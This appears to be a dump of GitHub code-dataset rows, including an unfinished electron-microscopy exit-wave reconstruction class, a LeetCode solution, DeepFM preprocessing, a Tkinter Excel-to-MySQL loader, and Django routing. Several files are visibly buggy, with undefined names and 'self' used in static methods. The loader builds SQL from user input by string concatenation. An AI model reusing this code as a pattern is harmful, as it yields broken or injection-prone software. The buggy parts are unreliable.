self.initial_defocus_sweep_num = defocus_sweep_num
self.defocus_search_criteria = defocus_search_criteria
self.defocus_search_range = [1.e9*x for x in defocus_search_range]
self.defocuses = self.defocus_initial_estimate()
if param_refinement:
self.rel_pos, self.defocuses = self.refine_params()
self.exit_wave = self.reconstruct()
@staticmethod
def get_stack_from_tifs(dir):
if dir[-1] != "/":
dir += "/"
files = glob.glob(dir+"*.tif")
stack = [imread(file, mode='F') for file in files]
return stack
def crop_stack(self, centres, side=None, resize_crop_for_reconstruction=True):
"""Crop parts of images from a stack"""
if not side:
#Calculate largest possible crop side
min_dist = 0
for centre in centres:
min_from_side = np.min([centres[0], centres[1], stack_side-centres[0], stack_side-centres[1]])
if min_from_side < min_dist:
min_dist = min_from_side
side = int(2*min_dist)
side_pow2 = int(np.log2(side))**2
crops = []
for img in self.stack:
left = int(centres[0]-side)
right = int(centres[0]+side)
bottom = int(centres[1]-side)
top = int(centres[1]+side)
horiz_over = centres[0]-int(centres[0])
vert_over = centres[1]-int(centres[1])
prop_tl = horiz_over*vert_over
prop_tr = (1.-horiz_over)*vert_over
prop_bl = horiz_over*(1.-vert_over)
prop_br = (1.-horiz_over)*(1.-vert_over)
crop = np.zeros((side, side))
for row, x in zip(range(side), range(left, left+side)):
for col, y in zip(range(side), range(left, left+side)):
zeros[col][row] = prop_tl*img[y+1][x]+prop_tr*img[y+1][x+1]+prop_bl*img[y][x]+prop_br*img[y][x+1]
crops.append(img[bottom:top,left:right])
if resize_crop_for_reconstruction:
return self.correct_cropped_stack_size(crops)
else:
return crops
def correct_cropped_stack_size(self, stack):
crop_side = min(int(np.log2(stack[0].shape[0]))**2, int(np.log2(self.reconstruction_side))**2)
cropped_stack = self.resize_stack(self.cropped_stack, crop_side)
return cropped_stack
@staticmethod
def resize_stack(stack, side):
return [cv2.resize(img, (side, side)) for img in stack]
def rel_pos_estimate(self, method="phase_corr", stack=None, rel_to_top_left=True):
if not stack:
stack = self.stack
rel_pos = []
if method == "phase_corr":
for i in range(1, len(self.stack)):
rel_pos.append(cv2.phaseCorrelate(self.stack[i-1], self.stack[i]))
if rel_to_top_left:
#chain relative positions from the centermost and find the position closest to the mean
pos = [[0., 0.]]*len(rel_pos)
for i, dx, dy in enumerate(rel_pos[1:], 1):
pos[i][0] = pos[i-1][0]+ rel_pos[i][0]
pos[i][1] = pos[i-1][1]+ rel_pos[i][1]
mean = [0., 0.]
for i in range(len(pos)):
mean[0] += pos[i][0]
mean[1] += pos[i][1]
mean[0] /= len(pos)
mean[1] /= len(pos)
dists = [(x-mean[0])**2+(y-mean[1])**2 for x, y in pos]
idx = dists.index(min(dists))
half_side = self.stack_side/2
return [(half_side+mean[0]-x, half_side+mean[1]-y) for x, y in pos]
else:
return rel_pos
@staticmethod
def calc_transfer_func(side, wavelength, defocus_change, pad_periods = 0, spher_aber_coeff=None,
aperture_mask=None):
px_dim = 1.+pad_periods
ctf_coeff = np.pi * wavelength * defocus_change
rec_px_width = 1.0 / (side*px_dim)
rec_origin = -1.0 / (2.0*px_dim)
rec_x_dist = rec_origin + rec_px_width * af.range(side, side, dim=0)
rec_y_dist = rec_origin + rec_px_width * af.range(side, side, dim=1)
rec_dist2 = rec_x_dist*rec_x_dist + rec_y_dist*rec_y_dist
ctf_phase = ctf_coeff*rec_dist2
if spher_aber_coeff:
ctf_phase += 0.5 * np.pi * wavelength**3 * spher_aber_coeff * rec_dist2**2
ctf = af.cos(ctf_phase) + complex(0, 1)*af.sin(ctf_phase)
if aperture_mask:
ctf *= aperture_mask
return ctf.as_type(af.Dtype.c32)
def fft_to_diff(self, fft):
return self.fft_shift(fft)
def diff_to_fft(self, diff):
return self.fft_to_diff(diff)
def propagate_wave(self, img, ctf):
fft = self.af_padded_fft2(img, self.pad_value, self.pad_periods)
ctf = self.diff_to_fft(ctf)
propagation = self.af_unpadded_ifft2(fft*ctf, self.pad_periods)
return propagation
@staticmethod
def propagate_to_focus(img, defocus, wavelength, pad_periods=0):
ctf = calc_transfer_func(
side=int(img.dims()[0]*(1+pad_periods)),
wavelength=wavelength,
defocus_change=-defocus,
pad_periods=pad_periods)
return self.propagate_wave(img, ctf)
@staticmethod
def propagate_back_to_defocus(exit_wave, defocus, wavelength, pad_periods=0):
ctf = calc_transfer_func(
side=int(img.dims()[0](1+pad_periods)),
wavelength=wavelength,
defocus_change=defocus,
pad_periods=pad_periods)
return propagate_wave(exit_wave, ctf)
@staticmethod
def reconstruct(stack, defocuses=None, num_iter = 50, stack_on_gpu=False):
"""GPU accelerate wavefunction reconstruction and mse calculation"""
stack_gpu = stack if stack_on_gpu else [np_to_af(img) for img in stack]
defocuses = defocuses if defocuses else self.defocuses
width = stack[0].shape[0]
height = stack[0].shape[1]
exit_wave = af.constant(0, width, height)
for i in range(num_iter):
if self.display_iter_nums:
print("Iteration {0} of {1}".format(i+1, num_iter))
exit_wave = 0
for img, idx in zip(stack_gpu, range(len(stack_gpu))):
#print("Propagation {0} of {1}".format(idx+1, len(stack)))
exit_wave += self.propagate_to_focus(img, defocuses[idx], self.wavelength)
exit_wave /= len(stack)
for idx in range(len(stack)):
amp = af.abs(stack_gpu[idx])
stack_gpu[idx] = self.propagate_back_to_defocus(exit_wave, defocuses[idx], self.wavelength)
stack_gpu[idx] = (amp / af.abs(stack_gpu[idx])) * stack_gpu[idx]
return exit_wave
def reconstruction_loss(self, stack_gpu, defocus_incr, defocus_ramp):
defocuses = [incr*ramp for incr, ramp in zip(defocus_incr, defocus_ramp)]
reconstruction = reconstruct(stack_gpu.copy(), defocuses, stack_on_gpu=True)
#Use the wavefunction to recreate the original images
deconstruction = [self.propagate_back_to_defocus(reconstruction, defocus, self.wavelength) \
for defocus in defocuses]
losses = [0.]*len(stack_gpu)
for i in range(len(losses)):
collapse = af.abs(deconstruction[i])**2
collapse *= af.mean(stack_gpu[i]) / af.mean(collapse)
losses[i] = af.mean((stack_gpu[i]-collapse)**2)
return np.max(losses)
def defocus_initial_estimate(self):
#Try various defocuses until one is found that matches the expected pattern
stack = self.cropped_stack
if self.series_type == "linear":
gen = lambda x: x
elif self.series_type == "quadratic":
gen = lambda x: x**2
elif self.series_type == "cubic":
gen = lambda x: x**3
mid = (self.series_mid if self.series_mid else len(stack) // 2) if self.series_alternating else 0
defocus_dir = 1.0 if self.series_increasing else -1.0
side = stack[0].shape[0]
stack_gpu = [np_to_af(img, af.Dtype.c32) for img in stack]
search_ramp = [(2**x / 2**self.initial_sweep_num) - 1 for x in range(0, self.initial_defocus_sweep_num)]
m = self.search_range[1]-self.search_range[0]
c = self.search_range[0]
defocus_incr = [m*x+c for x in search_ramp]
defocus_ramp = [defocus_dir*np.sign(x-mid)*gen(x-mid) for x in range(len(stack_gpu))]
losses = [self.reconstruction_loss(stack_gpu, incr, defocus_ramp) for incr in defocus_incr]
#Get the highest loss neigbouring the highest and refine using bilinear interpolation
idx = dists.index(max(losses))
if idx == 0:
idx1, idx2 = idx, 0
elif idx == self.initial_defocus_sweep_num-1:
idx1, idx2 = 0, idx
else:
idx1, idx2 = idx, idx+1 if losses[idx-1] < losses[idx+1] else idx-1, idx
losses = [losses[idx]]
incr1 = defocus_incr[idx1]
incr2 = defocus_incr[idx2]
if self.defocus_search_criteria == "gradient_plateau":
def condition(losses):
if len(losses) == 1:
return True
else:
return losses[-1] < losses[-2]
while True:
incr = 0.5*(incr1+incr2)
losses.append(self.reconstruction_loss(stack_gpu, incr, defocus_ramp))
if condition(losses):
incr1, incr2 = incr2, incr
else:
return incr2
def reconstruction_loss_arbitrary_params(self, centres, defocuses):
stack = self.crop_stack(centres)
stack_gpu = [np_to_af(img, af.Dtype.c32) for img in stack]
reconstruction = reconstruct(stack_gpu.copy(), defocuses, stack_on_gpu=True)
losses = [0.]*len(stack_gpu)
for i in range(len(losses)):
collapse = af.abs(deconstruction[i])**2
collapse *= af.mean(stack_gpu[i]) / af.mean(collapse)
losses[i] = af.mean((stack_gpu[i]-collapse)**2)
return np.max(losses)
def refine_params(self):
x0 = [x for x, _ in self.rel_pos] + [y for _, y in self.rel_pos] + self.defocuses
def loss(x):
len = len(x)
centres = [[0.,0.]]*(len//3)
for i in range(len):
centres[i][0] = x[i]
centres[i][1] = x[i+len]
return self.reconstruction_loss_arbitrary_params(centres, x[(2*len//3):])
refinement = minimize(
loss,
x0,
method='trust-krylov',
tol=1e-6,
iter=100)
x = refinement.x
len = len(x)
centres = [[0.,0.]]*(len//3)
for i in range(len):
centres[i][0] = x[i]
centres[i][1] = x[i+len]
return centres, x[(2*len//3):]
if __name__ == "__main__":
ewrec = EWREC(
stack_dir="E:/dump/stack1/",
wavelength=2.51e-12,
series_type = "quadratic",
series_middle=6,
series_increasing=True,
reconstruction_side=512)
| [
"noreply@github.com"
] | noreply@github.com |
5117dc2fd127111959aeb4c16a0827934522c3b0 | 9835b6949fe4c8018de57aee531dedf1509337cc | /September_2020/sep_11_Maximun_Product_Subarray.py | 3c6c6472a9a78f7529c7993b6863e42fdb1b0150 | [] | no_license | jcai0o0/My_Leetcode_Solutions | f6edea0693d252a99e6507a1724a89763113f8a0 | 3fc909c01c6a345f625c9ab9e0f1584ea5fa8ab4 | refs/heads/master | 2023-01-01T04:08:33.929184 | 2020-10-17T02:01:56 | 2020-10-17T02:01:56 | 289,094,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | class Solution:
def maxProduct(self, nums: List[int]) -> int:
if not nums:
return 0
N = len(nums)
f = [0] * N
g = [0] * N
f[0] = g[0] = res = nums[0]
for i in range(1, N):
f[i] = max(f[i-1] * nums[i], nums[i], g[i-1] * nums[i])
g[i] = min(f[i-1] * nums[i], nums[i], g[i-1] * nums[i])
res = max(res, f[i])
return res | [
"44845593+jcai0o0@users.noreply.github.com"
] | 44845593+jcai0o0@users.noreply.github.com |
e1beec084c59e4ff5804adb437d82d4db283c86a | b9d6dfd7f115b92a5372d1f22517c0ff8e99f4de | /Algorithm Practice/DeepFM/DeepFm.py | 80d2bb0d52701eef5b1edb728d2132c1d54ed9b0 | [] | no_license | yespon/CTR-Prediction | 8c0db3216eb96852a7e9ed523fa4035337fd5980 | 9f9afad89eb35c6e6bfe3b619f128714de6216a2 | refs/heads/master | 2020-04-17T06:44:53.760862 | 2019-01-12T08:30:59 | 2019-01-12T08:30:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,253 | py | import gc
import numpy as np
import pandas as pd
import tensorflow as tf
##################################
# 0. Functions
##################################
class Config(object):
"""
用来存储一些配置信息
"""
self.feature_dict = None
self.feature_size = None
self.field_size = None
self.embedding_size = 8
self.epochs = 20
self.deep_layers_activation = tf.nn.relu
self.loss = "logloss"
self.l2_reg = 0.1
self.learning_rate = 0.1
def FeatureDictionary(dfTrain=None, dfTest=None, numeric_cols=None, ignore_cols=None):
"""
目的是给每一个特征维度都进行编号。
1. 对于离散特征,one-hot之后每一列都是一个新的特征维度。所以,原来的一维度对应的是很多维度,编号也是不同的。
2. 对于连续特征,原来的一维特征依旧是一维特征。
返回一个feat_dict,用于根据 原特征名称和特征取值 快速查询出 对应的特征编号。
:param dfTrain: 原始训练集
:param dfTest: 原始测试集
:param numeric_cols: 所有数值型特征
:param ignore_cols: 所有忽略的特征. 除了数值型和忽略的,剩下的全部认为是离散型
:return: feat_dict, feat_size
1. feat_size: one-hot之后总的特征维度。
2. feat_dict是一个{}, key是特征string的col_name, value可能是编号(int),可能也是一个字典。
如果原特征是连续特征: value就是int,表示对应的特征编号;
如果原特征是离散特征:value就是dict,里面是根据离散特征的 实际取值 查询 该维度的特征编号。 因为离散特征one-hot之后,一个取值就是一个维度,
而一个维度就对应一个编号。
"""
assert not (dfTrain is None), "train dataset is not set"
assert not (dfTest is None), "test dataset is not set"
# 编号肯定是要train test一起编号的
df = pd.concat([dfTrain, dfTest], axis=0)
# 返回值
feat_dict = {}
# 目前为止的下一个编号
total_cnt = 0
for col in df.colums:
if col in ignore_cols: # 忽略的特征不参与编号
continue
# 连续特征只有一个编号
if col in numeric_cols:
feat_dict[col] = total_cnt
total_cnt += 1
continue
# 离散特征,有多少取值就有多少个编号
unique_vals = df[col].unique()
unique_cnt = df[col].nunique()
feat_dict[col] = dict(zip(unique_vals, range(total_cnt, total_cnt + unique_cnt)))
total_cnt += unique_cnt
feat_size = total_cnt
return feat_dict, feat_size
def parse(feat_dict=None, df=None, has_table=False):
"""
构造FeatureDict,用于后面Embedding
:param feat_dict: FeatureDictionary生成的。用于根据col和value查询出特征编号的字典
:param df: 数据输入。可以是train也可以是test,不用拼接
:param has_label: 数据中是否包含label
:return: Xi, Xv, y
"""
assert not (df is None), "df is not set"
dfi = df.copy()
if has_table:
y = df['target'].values.tolist()
dfi.drop(['id', 'target'], axis=1, inplace=True)
else:
ids = dfi['id'].values.tolist() # 预测样本的ids
dfi.drop(['ids'], axis=1, inplace=True) # axis : {0 or ‘index’, 1 or ‘columns’}, default 0
# dfi是Feature index,大小和dfTrain相同,但是里面的值都是特征对应的编号。
# dfv是Feature value, 可以是binary(0或1), 也可以是实值float,比如3.14
dfv = dfi.copy()
for col in dfi.columns:
if col in IGNORE_FEATURES: # 用到的全局变量: IGNORE_FEATURES, NUMERIC_FEATURES
dfi.drop([col], axis=1, inplace=True)
dfv.drop([col], axis=1, inplace=True)
continue
if col in NUMERIC_FEATURES: # 连续特征1个维度,对应1个编号,这个编号是一个定值
dfi[col] = feat_dict[col]
else:
# 离散特征。不同取值对应不同的特征维度,编号也是不同的。
dfi[col] = dfi[col].map(feat_dict[col])
dfv[col] = 1.0
| [
"duboyabz@gmail.com"
] | duboyabz@gmail.com |
ef329163d8ddd24d65ba20c4af2ae929f5b09b6c | f6fd4aeeee18cb94ccc9de07ca71f5ed085c4fd9 | /gui.py | 88f601bc33d9963dfdec98015e696444daee8168 | [] | no_license | a7n007/lillyscripts | a00f6c7ed29639d66b3fe87554cf2f3f90f96936 | 85a4f46df6fcc750b5d33dd18768a29f3c6e0164 | refs/heads/master | 2020-04-07T05:02:03.701045 | 2019-05-31T10:29:20 | 2019-05-31T10:29:20 | 158,080,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,326 | py | #import tkinter
from tkinter import *
#create database and table
import mysql.connector
#import xlrd to read xcel files
import xlrd
root = Tk()
root.title("EXCEL to Mysql")
root.geometry("1000x1000+0+0")
root.configure(bg="black")
#INSTRUCTIONS :
lel = Label(root,text="INSTRUCTIONS : ",font=("arial",20)).pack()
lel = Label(root,text="1 . RENAME ALL FILES TO NUMBERS IN ASCENDING ORDER AND PLACE IN A FOLDER: ",font=("arial",15)).pack()
lel = Label(root,text="eg: if there are 3 files then 1.xlxs,2.xlxs,3.xlxs should be their names",font=("arial",20)).pack()
lel = Label(root,text="CHOOSE DEFAULT OR CUSTOM NOT BOTH",font=("arial",10)).pack()
#declare all variables
hst = StringVar()
usr = StringVar()
passd = StringVar()
tbname = StringVar()
dbname = StringVar()
aloc = StringVar()
n = IntVar()
lel = Label(root,text="ENTER YOUR SERVER DETAILS : ",font=("arial",15,"bold")).pack()
lel = Label(root,text="host : ",font=("arial",15,"bold")).pack()
eb1 = Entry(root,textvariable=hst,width=25).pack()
lel = Label(root,text="user : ",font=("arial",15,"bold")).pack()
eb2 = Entry(root,textvariable=usr,width=25).pack()
lel = Label(root,text="password : ",font=("arial",15,"bold")).pack()
eb3 = Entry(root,textvariable=passd,width=25).pack()
#custom settings
lel = Label(root,text="INSERT DATA : ",font=("arial",30,"bold")).pack()
n = IntVar()
lel = Label(root,text="enter your DB NAME ",font=("arial",15,"bold")).pack()
eb4 = Entry(root,textvariable=dbname,width=25).pack()
lel = Label(root,text="enter your TABLE NAME ",font=("arial",15,"bold")).pack()
eb5 = Entry(root,textvariable=tbname,width=25).pack()
def default_insert():
mydb = mysql.connector.connect(
host=hst.get(),
user=usr.get(),
passwd=passd.get())
cursor = mydb.cursor()
cursor.execute("create "+"database "+dbname.get())
cursor.execute("use "+dbname.get())
cursor.execute("create table "+tbname.get()+" (name varchar(30),job varchar(30),mobile varchar(30))")
lel = Label(root,text="CREATED SUCCESFULLY",font=("arial",15,"bold")).pack()
btnd = Button(root,text="CLICK TO CREATE DATABASE AND TABLE",width=30,height=1,bg="Lightblue",command =default_insert).pack()
#read number of xcel files
lel = Label(root,text="enter your Number of EXCEL SHEETS ",font=("arial",15,"bold")).pack()
eb6 = Entry(root,textvariable=n,width=25).pack()
jobs = ["housemaids","babysitters","cooks","nannies","patientcare","helpers"]
names = ["mumbai"," new delhi","kolkata","bengaluru","hyderabad"," chennai"," ahmedabad","vishakapatnam","pune","surat","jaipur","lucknow","kanpur","nagpur","indore","jamshedpur","patna","durgapur","dhanbad","Vadodara"]
def lcs(X, Y, m, n):
LCSuff = [[0 for k in range(n+1)] for l in range(m+1)]
result = 0
for i in range(m + 1):
for j in range(n + 1):
if (i == 0 or j == 0):
LCSuff[i][j] = 0
elif (X[i-1] == Y[j-1]):
LCSuff[i][j] = LCSuff[i-1][j-1] + 1
result = max(result, LCSuff[i][j])
else:
LCSuff[i][j] = 0
return result
def potential(name,ip):
print(name,ip)
l = 0
pt = 0
if(len(ip)<len(name)):
l = len(ip)
l1 = len(name)
for c in range(0,l):
if(ord(ip[c]) == ord(name[c])):
pt = pt + 1
pt = pt + lcs(name,ip,l1,l) * 0.5
else:
l = len(name)
li = len(ip)
for c in range(0,l):
if(ord(ip[c]) == ord(name[c])):
pt = pt + 1
pt = pt + lcs(name,ip,l,li) * 0.5
return pt
def selfcorrectn(ip):
min = -9999999999999
final = ""
ipl = len(ip)
for name in names:
y = potential(name,ip)
if(min < y):
min = y
final = name
print(min)
return final
def selfcorrectj(ip):
min = -9999999999999
final = ""
ipl = len(ip)
for job in jobs:
y = potential(job,ip)
if(min < y):
min = y
final = job
return final
def custom_insert():
mydb = mysql.connector.connect(
host=hst.get(),
user=usr.get(),
passwd=passd.get())
cursor = mydb.cursor()
lel = Label(root,text="CONNECTED SUCCESFULLY",font=("arial",15,"bold")).pack()
#INSERT DATA FROM EXCEL FILES
cursor = mydb.cursor()
#using database xlproject(any name)
sr = "use " + str(dbname.get())
cursor.execute(sr)
#create arrays of data from xl sheets
name=[]
job=[]
mobile=[]
for k in range(1,n.get()+1):
loc = (str(k))
wb = xlrd.open_workbook(loc)
sheet = wb.sheet_by_index(0)
for i in range(0,3):
for j in range(1,sheet.nrows):
if(sheet.cell_value(0,i)=='name'):
x = selfcorrectn(sheet.cell_value(j,i))
name.append(x)
if(sheet.cell_value(0,i)=='job'):
x = selfcorrectj(sheet.cell_value(j,i))
job.append(x)
if(sheet.cell_value(0,i)=='mobile'):
mobile.append(sheet.cell_value(j,i))
#insert touples into emp(rename) table database
sql = 'insert into '+tbname.get() +' (name,job,mobile) values(%s,%s,%s)'
for i in range(0,len(name)):
tup = (name[i],job[i],str(mobile[i]))
cursor.execute(sql,tup)
mydb.commit()
lel = Label(root,text="Dumped ,check your database",font=("arial",15,"bold")).pack()
btn = Button(root,text="CLICK TO INSERT into table",width=30,height=1,bg="Lightblue",command =custom_insert).pack()
#loop this file
root.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
eba02e9038c9938b77410423ec74c8f662de3900 | dc40f134d3713c0a4951588182bbe64b580761ef | /web/timeline/notification.py | 03e878a7ae2d6364135b9aa836ab2a0d4f958722 | [
"MIT"
] | permissive | hkpeprah/television-2.0 | 79eaa553dc1246fc9fb468fd14830ef7fdccc3b7 | 8d6ce9cc7c8e22447769845159464422153cb8f6 | refs/heads/master | 2021-01-15T15:34:02.739470 | 2015-10-18T00:02:44 | 2015-10-18T00:05:15 | 38,463,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | from base import ValidatableObject
from fields import DateField
from layout import Layout
class Notification(ValidatableObject):
"""
Notification object.
"""
def __init__(self, *args, **kwargs):
self.time = DateField(required=True)
self.layout = Layout()
super(Notification, self).__init__()
| [
"ford.peprah@uwaterloo.ca"
] | ford.peprah@uwaterloo.ca |
9e8f98113d5172a7d06f4107a2986b94b9e633be | d092a6a5622b8efa4d43c11708d50b0fcce832f7 | /DictionaryBE/Dictionary/urls.py | 2b3a07ca656c271c7de9b5abd047ab74646b5ff7 | [] | no_license | sjovanov/MK-Dict | 75f52921b88c0a538f8005399fe41fda12cbc906 | f723bd9bf09eb7c505077695513c32accfe364a0 | refs/heads/main | 2023-03-19T00:51:40.523391 | 2021-03-16T11:52:56 | 2021-03-16T11:52:56 | 338,067,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | """Dictionary URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
from django.urls import path, include
from words.views import WordViewSet, SentenceViewSet, UserViewSet
from rest_framework import routers
from rest_framework.authtoken.views import obtain_auth_token
router = routers.DefaultRouter()
router.register(r'words', WordViewSet)
router.register(r'sentence', SentenceViewSet)
router.register(r'users', UserViewSet)
urlpatterns = [
path('', include(router.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('auth/', obtain_auth_token),
]
| [
"stefan.jovanov98@gmail.com"
] | stefan.jovanov98@gmail.com |
d947f5ef0633272965e0c668af89b9c0bcf56449 | c28ccac2daa674df07470a85d13552639a98e323 | /shelvefile2.py | 14094e86f477a765c391151e84967ea720df30cf | [] | no_license | jnprogrammer/basic_python | 69f2ff356ebf1da120789884f99aea197856e6c0 | 99fe4d6bb8c6aafd3701cc725e511e9967d9b0ca | refs/heads/master | 2022-09-26T00:39:32.347757 | 2020-06-02T02:43:04 | 2020-06-02T02:43:04 | 261,020,958 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | import shelve
#with shelve.open('ShelfTest') as fruit:
fruit = shelve.open('ShelfTest')
fruit['apple'] = "1 fruit"
fruit['lemon'] = "2 fruit"
fruit['grape'] = "3 fruit"
fruit['lime'] = "4 fruit"
fruit['orange'] = "5 fruit"
print(fruit["lemon"])
print(fruit["lime"])
fruit.close()
print(fruit) | [
"joshuanparker@gmail.com"
] | joshuanparker@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.